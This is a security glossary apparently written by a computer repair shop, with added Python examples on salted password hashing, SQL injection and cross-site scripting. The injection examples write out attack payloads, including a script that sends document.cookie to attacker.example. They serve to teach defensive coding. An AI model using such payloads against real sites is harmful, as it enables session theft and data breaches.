A plain-English reference for the antivirus and security terms you'll encounter in our articles, your security software, and the news. Written for PC and Mac owners by the certified technicians at our Roswell shop.
Ninety-nine terms, alphabetized, across nine categories — from malware and attack methods to identity, privacy, network, mobile, and hardware-level security. Each term is tagged so you can tell at a glance what kind of thing you're looking at. Where useful, we've added a short tip on what to do if you encounter the thing. If a term isn't here, drop us a line — we'll add it.
Software that displays unwanted ads — pop-ups, banner injections, redirected search results. Often bundled with free downloads, sometimes a vehicle for worse infections.
The encryption algorithm used by virtually every secure system today — BitLocker, FileVault, WPA2/3, HTTPS. AES-256 means a 256-bit key, currently considered unbreakable by brute force.
A computer or backup drive that has no network connection — physically isolated from any network. The strongest defense against remote attack, used for offline backups and high-security systems.
Software that scans files and processes for known malware signatures and suspicious behavior. Windows Defender (built into Windows 10/11) is sufficient for most home users.
A targeted, long-running attack — usually nation-state or organized crime — that quietly maintains access to a network for months or years. Rarely a concern for home users.
The process of proving you are who you say you are — typically via password, biometric, or hardware key. Distinct from authorization, which is what you're allowed to do once authenticated.
A covert remote-access channel an attacker installs (or that a developer left in) so they can re-enter the system at will, bypassing normal authentication.
A separate copy of your data stored somewhere your machine can't reach in normal operation. The 3-2-1 rule: 3 copies, on 2 different media, with 1 off-site.
Authentication based on a physical trait — fingerprint, face, iris. Fast and convenient, but unlike a password, you can't change your fingerprint after a breach.
The low-level firmware that runs before your operating system loads, initializing hardware. UEFI replaced the older BIOS on modern machines and supports Secure Boot.
An old class of virus that infected the first sector of a hard disk so it ran before the OS loaded. Largely defeated by Secure Boot on modern UEFI systems, but rare specimens still appear.
A network of compromised computers controlled remotely by an attacker — used to send spam, run DDoS attacks, or mine cryptocurrency. Your machine can be a botnet member without you noticing.
Malware that changes your browser's homepage, search engine, or new-tab page to one the attacker controls — usually to push ads or harvest search data.
An attack that tries every possible password until one works. Defended against by long passwords, rate limiting, and lockout policies.
A puzzle (pick the traffic lights, click the boxes) used to distinguish humans from automated bots. Increasingly defeated by AI; many sites have moved to invisible behavioral checks instead.
An attack that overlays an invisible button on top of what you think you're clicking — you "Like" something or grant a permission without realizing.
A small piece of data a website stores in your browser — used legitimately for login sessions and preferences, sometimes abused for cross-site tracking. Not malware on its own.
An attack that takes username/password pairs leaked from one breach and tries them on other sites, banking on password reuse. Defeated by a unique password per site.
Software that secretly uses your machine's CPU or GPU to mine cryptocurrency for an attacker. Often shows up as a hot, slow, fan-running computer with no visible cause.
Parts of the internet that require special software (commonly Tor) to access. Used for both privacy-protective and illegal activity, including the sale of stolen credentials.
An incident where data — credentials, personal info, financial data — leaks from a company's systems into the wild. Free site haveibeenpwned.com tells you if your email is in known breaches.
An attack that overwhelms a server or service with traffic from many sources at once, knocking it offline. Targets are usually businesses, not home users.
AI-generated audio or video impersonating a real person. Increasingly used in voice-phishing scams that imitate a family member's voice or a CEO's face on a video call.
A cryptographic credential that proves a website (or person) is who it claims to be. The lock icon in your browser checks the site's certificate against a chain of trusted authorities.
An attack that changes which servers your machine asks to translate domain names — silently redirecting your traffic to attacker-controlled sites even when the URL looks correct.
Malware that installs automatically when you visit a compromised website, exploiting a browser or plugin vulnerability without any click required.
A modern, behavior-based step beyond traditional antivirus. Records what processes do and flags suspicious patterns. Mostly a business tool; some consumer AV products now include EDR-style features.
Mathematical scrambling of data so only someone with the right key can read it. Two flavors: at rest (BitLocker, FileVault) protects a stolen drive; in transit (HTTPS, VPN) protects data on the wire.
Any device on a network — laptop, phone, server, smart fridge. "Endpoint security" means protecting individual devices rather than the network around them.
Code that takes advantage of a specific vulnerability in software to do something the software wasn't supposed to allow — usually to run an attacker's code.
When AV flags a legitimate file as malicious. Common with heuristic detection. If you're sure a flagged file is safe, you can usually allow it; if you're not sure, ask us.
Modern malware that runs entirely in memory and leaves no executable file on disk. Defeats signature-based AV; detected only by behavior monitoring or memory forensics.
A filter between your machine (or network) and the internet that decides what traffic is allowed in or out. Built into Windows and macOS; also a feature of your home router.
European data-protection law that gives individuals rights over how their personal data is collected, stored, and used. Has shaped privacy practices and cookie banners worldwide.
A one-way mathematical fingerprint of a file or password. Two different inputs essentially never produce the same hash. Used for integrity checks and for storing passwords without storing the password itself.
AV detection based on behavior patterns rather than known signatures — flags software that acts like malware even if it's never been seen before. Catches more new threats but produces more false positives.
A web standard that tells your browser "always use HTTPS for this site, never plain HTTP." Defends against downgrade attacks where an attacker tries to force you onto unencrypted HTTP.
The encrypted version of HTTP, indicated by the lock icon in your browser's address bar. Protects what you send to and receive from a site, but doesn't guarantee the site itself is trustworthy.
When someone impersonates you using stolen credentials or personal data — opening accounts, filing tax returns, or taking out loans in your name. Recovery can take months.
Network-monitoring tools that watch for suspicious traffic. IDS alerts; IPS actively blocks. Mostly business-grade, but some consumer routers and firewalls include lightweight IDS features.
The structured process of detecting, containing, eradicating, and recovering from a security incident. Has a formal lifecycle in business security but the principles apply at home too.
Networked smart devices — thermostats, doorbells, fridges, cameras, light bulbs. Often poorly secured and a common entry point onto home networks.
Removing the manufacturer's software restrictions on a phone or tablet so you can install apps from outside the official store. Voids most security guarantees of the device.
Software (occasionally hardware) that records every keystroke — capturing passwords, messages, and credit card numbers as you type them. Usually bundled inside spyware.
The principle that a user, program, or service should have only the access it needs to do its job — no more. The single most important architectural defense in security.
Malicious code that lies dormant until a specific trigger (a date, a condition) fires it. Often planted by an insider before they leave a company.
Malware embedded in Office document macros (Word, Excel). Triggered when you open the file and click "Enable Macros." Still common in business phishing. Current versions of Office block macros in files downloaded from the internet by default; treat any document that asks you to unblock them as suspect.
Umbrella term for malicious software. Includes viruses, worms, trojans, spyware, ransomware, rootkits, adware, and others. The word "virus" is often misused to mean any of these.
Requiring a second proof beyond your password — usually a code from an authenticator app or hardware key. SMS codes are better than nothing but vulnerable to SIM-swap attacks.
An attack where the attacker secretly relays and possibly alters communication between two parties who believe they're talking directly to each other. Common on unsecured public Wi-Fi.
Dividing a network into separate zones (your laptops, your IoT devices, your guest Wi-Fi) so a compromise in one zone can't easily reach the others. A common pattern: main + IoT + guest.
The standard that lets you "Sign in with Google/Apple/Microsoft" on third-party sites without giving them your password. The site receives a limited-scope token instead.
A passwordless login standard backed by Apple, Google, and Microsoft that replaces the password with a cryptographic key stored on your device and unlocked by its biometric or PIN. Strongly resistant to phishing: the key only answers the site it was created for, so a lookalike domain gets nothing usable.
A program that stores a unique strong password for every account, locked behind one master password. Bitwarden, 1Password, and similar are far safer than reusing passwords.
A software update that fixes a known vulnerability. The single most effective defense against most malware is keeping your OS and apps patched.
An attack that secretly redirects your traffic from a legitimate site to a fake one — usually via DNS hijacking — without changing the URL you typed in your browser.
A fake email, text, or page designed to look like a legitimate one (your bank, Microsoft, the IRS) to trick you into entering credentials or clicking a malicious link. The most common way home users get compromised.
An attacker who's gained limited access then exploits a vulnerability to gain administrator-level access on a compromised machine. The bridge from "got in" to "owns everything."
A pair of mathematically linked keys used in asymmetric cryptography. Anything encrypted with the public key can only be decrypted by the private key. Underpins HTTPS, SSH, and modern messaging apps.
Borderline software — toolbars, "registry cleaners," fake optimizers — that isn't quite malware but isn't something you wanted either. Usually bundled with free downloads.
An isolated holding area inside your antivirus program where suspect files are kept (encrypted, unable to run) until you decide whether to delete or restore them.
Phishing delivered via a malicious QR code — on a parking meter, a restaurant menu, an email attachment. Bypasses URL-filtering since the link is hidden inside the image.
Malware that encrypts your files and demands payment (usually in cryptocurrency) for the decryption key. The defense is offline backups; once encrypted without backups, recovery is rarely possible.
The long, randomly-generated string that lets you decrypt a BitLocker or FileVault drive if you lose your password. Without it, the drive is unrecoverable.
Malware that buries itself deep in the operating system to hide other malware from antivirus and from you. Detection usually requires booting the drive into a separate environment.
A random value added to a password before hashing so two users with the same password produce different hashes. Prevents pre-computed lookup-table attacks.
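The "hash" and "salt" entries above describe how a site should store passwords. The following is an added example (not code from this glossary or from any product named on the page) showing the two ideas working together: a per-user salt, a slow hash (PBKDF2 from Python's standard library), a constant-time check, and why a salt defeats a pre-computed lookup table. The iteration count and the list of "common passwords" are constructed for the demo.

```python
import hashlib
import hmac
import os

# Added example, not the glossary's own code. The iteration count is kept modest so
# the demo runs quickly; a real deployment would use the current OWASP-recommended figure.
PBKDF2_ITERATIONS = 100_000
# Constructed list standing in for an attacker's dictionary of common passwords.
COMMON_PASSWORDS = ["password", "123456", "qwerty", "letmein"]


def hash_password(password: str, salt: bytes = b"") -> tuple:
    """Return (salt, digest). Draws a fresh random 16-byte salt when none is supplied."""
    if not salt:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, expected: bytes) -> bool:
    """Recompute with the stored salt; constant-time compare avoids timing leaks."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected)


def same_password_distinct_digests(password: str) -> bool:
    """Two accounts with the same password end up with unrelated stored values."""
    salt_a, digest_a = hash_password(password)
    salt_b, digest_b = hash_password(password)
    return salt_a != salt_b and digest_a != digest_b


def precomputed_table_hit(password: str, salt: bytes = b"") -> bool:
    """Does a table of pre-hashed common passwords match the stored hash?

    Unsalted: the stored SHA-256 of 'letmein' is exactly what the table holds.
    Salted: the stored value is SHA-256(salt + password), which no table built in
    advance contains, so the attacker must start over for every user.
    """
    table = {hashlib.sha256(p.encode()).digest() for p in COMMON_PASSWORDS}
    stored = hashlib.sha256(salt + password.encode()).digest()
    return stored in table


if __name__ == "__main__":
    salt, digest = hash_password("correct horse battery staple")
    print("verify good:", verify_password("correct horse battery staple", salt, digest))
    print("verify bad: ", verify_password("wrong", salt, digest))
    print("unsalted table hit:", precomputed_table_hit("letmein"))
    print("salted table hit:  ", precomputed_table_hit("letmein", b"\x01\x02"))
```

The slow hash is what makes the brute-force entry above expensive for the attacker: each guess costs the same 100,000 rounds the legitimate login pays once.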
An isolated environment where suspect software runs without being able to affect the rest of the system — used by AV products to safely test files, and by browsers to contain page code.
Fake "Your computer is infected!" pop-ups that try to panic you into installing a program (which is itself the malware) or paying for fake support. Often delivered via web ads.
A UEFI feature that refuses to load operating-system code that hasn't been signed by a trusted vendor. Defends against bootkits and rootkits that try to load before the OS.
Stealing the cookie or token that proves you're logged in to a site, then using it to access the account without needing the password. Why HTTPS and HSTS matter.
A unique fingerprint (often a hash or byte pattern) that identifies a specific piece of known malware. Effective for known threats, useless for new ones — hence the move toward heuristic and behavioral methods.
Convincing a mobile carrier (often via social engineering) to transfer your phone number to an attacker's SIM card — defeating SMS-based 2FA and potentially locking you out of accounts.
A physical device attached to an ATM, gas pump, or card reader that records magnetic-stripe data as you swipe. Wiggle the card slot before inserting — skimmers often feel loose.
Phishing delivered via text message — fake delivery notifications, fake bank alerts, fake IRS warnings. Has overtaken email as the most common phishing channel for personal accounts.
A team or facility that monitors a network 24/7 for security events. Mostly a business concept; large enterprises run a SOC, smaller ones contract one.
Manipulating a person rather than a machine — a fake phone call from "Microsoft support," a phishing email, a tailgater at the office door. The human is almost always easier to compromise than the technology.
Phishing customized for a specific target — using their real name, employer, or recent project — making it far harder to spot than mass phishing. Often the first step in a major breach.
Malware that secretly observes — keystrokes, screenshots, microphone, browsing history — and exfiltrates the data to an attacker. Often combined with keyloggers.
An attack that smuggles database commands into a website's text fields. Mostly a web-developer concern, but a common cause of the data breaches that end up exposing your credentials.
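To make the "smuggles database commands into text fields" description concrete, here is an added example (not code from this glossary) using Python's built-in SQLite driver. The table, its rows, and the attacker inputs are constructed. The vulnerable lookup pastes the username into the SQL text; the safe one passes it as a parameter, so the same input is treated as data rather than as part of the query.

```python
import sqlite3

# Added example, not the glossary's own code. The table and its rows are constructed.


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pw_hash TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "hash-a"), ("bob", "hash-b"), ("carol", "hash-c")],
    )
    return conn


def find_user_vulnerable(conn, username: str) -> list:
    """The attacker's text is spliced into the SQL, so quotes in it rewrite the query."""
    query = f"SELECT username FROM users WHERE username = '{username}' ORDER BY username"
    return [row[0] for row in conn.execute(query)]


def find_user_safe(conn, username: str) -> list:
    """Parameterized: the value travels separately from the SQL and is never parsed as code."""
    query = "SELECT username FROM users WHERE username = ? ORDER BY username"
    return [row[0] for row in conn.execute(query, (username,))]


# Constructed attacker inputs.
# Closes the quoted literal and appends an always-true clause: every row comes back.
TAUTOLOGY = "' OR '1'='1"
# Closes the literal and comments out the rest of the statement.
COMMENT_OUT = "bob' --"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:", find_user_vulnerable(db, TAUTOLOGY))  # all three users
    print("safe, tautology:      ", find_user_safe(db, TAUTOLOGY))        # nobody has that name
    print("vulnerable, comment:  ", find_user_vulnerable(db, COMMENT_OUT))
    print("safe, comment:        ", find_user_safe(db, COMMENT_OUT))
```

The same bug in a real application would typically sit behind a login or search form; the fix is always the parameterized form, never quoting or filtering the input yourself.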
The encryption protocol underlying HTTPS. SSL is the older name; TLS is the current standard. The lock icon in your browser means a TLS connection is active.
One login that grants access to multiple related services. "Sign in with Microsoft 365" is SSO. Convenient, but a compromised SSO account is a master key.
An attack that compromises a trusted vendor (a software updater, a hardware supplier, a cloud provider) to reach the vendor's many customers at once. SolarWinds and 3CX are well-known examples.
Anyone behind a cyberattack — categorized by motivation (financial, political, ideological) and capability (script kiddie, criminal, nation-state).
A small chip on your motherboard that stores encryption keys and credentials securely. Required by Windows 11; used by BitLocker and Windows Hello.
Malware disguised as something legitimate. Named for the Trojan Horse — you let it in voluntarily because it looked useful. Among the most common infection vectors today.
The Windows prompt that pops up before changes to system settings or installations. Annoying when frequent, but the most effective defense against silent installs.
In the strict sense: code that attaches itself to a legitimate file and replicates when that file is opened. The word is widely used (loosely) to mean any malware, but true viruses are now relatively rare compared to trojans.
Phishing delivered by phone call — fake "Microsoft support," fake bank fraud alerts, fake IRS warnings. Caller ID spoofing makes the number appear legitimate.
A way to separate one physical network into isolated logical networks. Used at home (on better routers) to keep IoT devices off your main network.
An encrypted tunnel between your device and a VPN provider's server, used to protect traffic on untrusted networks (public Wi-Fi) and to obscure your IP. Doesn't protect you from malware, only from network eavesdropping.
A flaw in software (or hardware) that can be exploited to make it do something it wasn't supposed to. Patches close vulnerabilities; until patched, a vulnerability is an open door.
An attacker compromises a website that members of a target group are known to visit (an industry forum, a niche news site) and waits for the targets to come to them. Indirect, hard to detect.
Phishing aimed specifically at high-value targets — executives, finance staff, IT administrators — usually with a hand-crafted message that's harder to spot than mass phishing.
Capturing wireless network traffic from nearby devices. Modern HTTPS makes most captured traffic unreadable, but unsecured Wi-Fi networks still leak metadata and connection patterns.
Self-replicating malware that spreads across networks on its own — no host file required and no user action needed. Famous examples: Conficker, WannaCry.
Wi-Fi encryption standards. WPA3 is current; WPA2 (with AES/CCMP) is acceptable; WEP is broken and can be cracked in minutes, and the original WPA (TKIP) is deprecated with known attacks. Set your router to WPA2 or WPA3 only.
An attack where malicious JavaScript injected into one site runs in your browser when you visit, often stealing cookies or session tokens. A web-developer issue, but the cause of many account takeovers.
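As an added illustration of this entry and of the session-hijacking entry above (not code from this glossary), the example below renders a user-submitted comment into a page two ways. The vulnerable version drops the text straight in, so a constructed payload becomes a real `<script>` tag or an `onerror` handler that could ship the session cookie to an attacker; the safe version escapes it with Python's `html.escape`. A small parser from the standard library stands in for the browser to show what each version actually contains. Templates and payloads are constructed.

```python
import html
from html.parser import HTMLParser

# Added example, not the glossary's own code. Templates and payloads are constructed.


def render_comment_vulnerable(body: str) -> str:
    """Drops user text straight into the page, so '<' and '"' in it become markup."""
    return f'<p class="comment">{body}</p>'


def render_comment_safe(body: str) -> str:
    """html.escape turns < > & " ' into entities; the browser shows them as text."""
    return f'<p class="comment">{html.escape(body, quote=True)}</p>'


def render_input_vulnerable(value: str) -> str:
    """Attribute context: a stray double quote lets the input add new attributes."""
    return f'<input name="q" value="{value}">'


def render_input_safe(value: str) -> str:
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


class _Tags(HTMLParser):
    """Collects start tags and attribute names the way a browser's parser would see them."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(name for name, _ in attrs)


def injected_tags(markup: str, allowed=("p", "input")) -> list:
    """Tags in the rendered HTML that the template itself did not put there."""
    p = _Tags()
    p.feed(markup)
    p.close()
    return [t for t in p.tags if t not in allowed]


def event_handlers(markup: str) -> list:
    """on* attributes (onerror, onfocus, ...) that would run JavaScript on load or focus."""
    p = _Tags()
    p.feed(markup)
    p.close()
    return [a for a in p.attrs if a.startswith("on")]


# Constructed attacker inputs.
SCRIPT_PAYLOAD = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"
IMG_PAYLOAD = '<img src=x onerror="alert(document.cookie)">'
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'


if __name__ == "__main__":
    print("vulnerable comment tags:", injected_tags(render_comment_vulnerable(SCRIPT_PAYLOAD)))
    print("safe comment tags:      ", injected_tags(render_comment_safe(SCRIPT_PAYLOAD)))
    print("vulnerable img handlers:", event_handlers(render_comment_vulnerable(IMG_PAYLOAD)))
    print("vulnerable attr handlers:", event_handlers(render_input_vulnerable(ATTR_PAYLOAD)))
    print("safe attr handlers:      ", event_handlers(render_input_safe(ATTR_PAYLOAD)))
```

Escaping has to match where the text lands (between tags versus inside a quoted attribute); `html.escape(..., quote=True)` covers both of the contexts shown here, which is why the safe renderers use it everywhere.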
A vulnerability that the software vendor doesn't know about yet, meaning no patch exists. Named for the number of days defenders have had to fix it. Highly valuable to attackers.
A computer that's been compromised and added to a botnet without the owner knowing. Receives commands from a command-and-control server.